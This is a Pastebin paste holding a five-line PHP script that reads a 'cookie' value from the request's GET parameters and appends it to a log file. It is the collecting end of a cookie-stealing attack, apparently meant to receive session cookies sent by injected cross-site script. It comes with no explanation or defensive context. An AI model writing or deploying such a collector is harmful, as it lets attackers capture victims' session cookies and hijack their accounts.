Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $cookie = $HTTP_GET_VARS["cookie"];
- $file = fopen('log.txt', 'a');
- fwrite($file, $cookie . "\n\n");
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement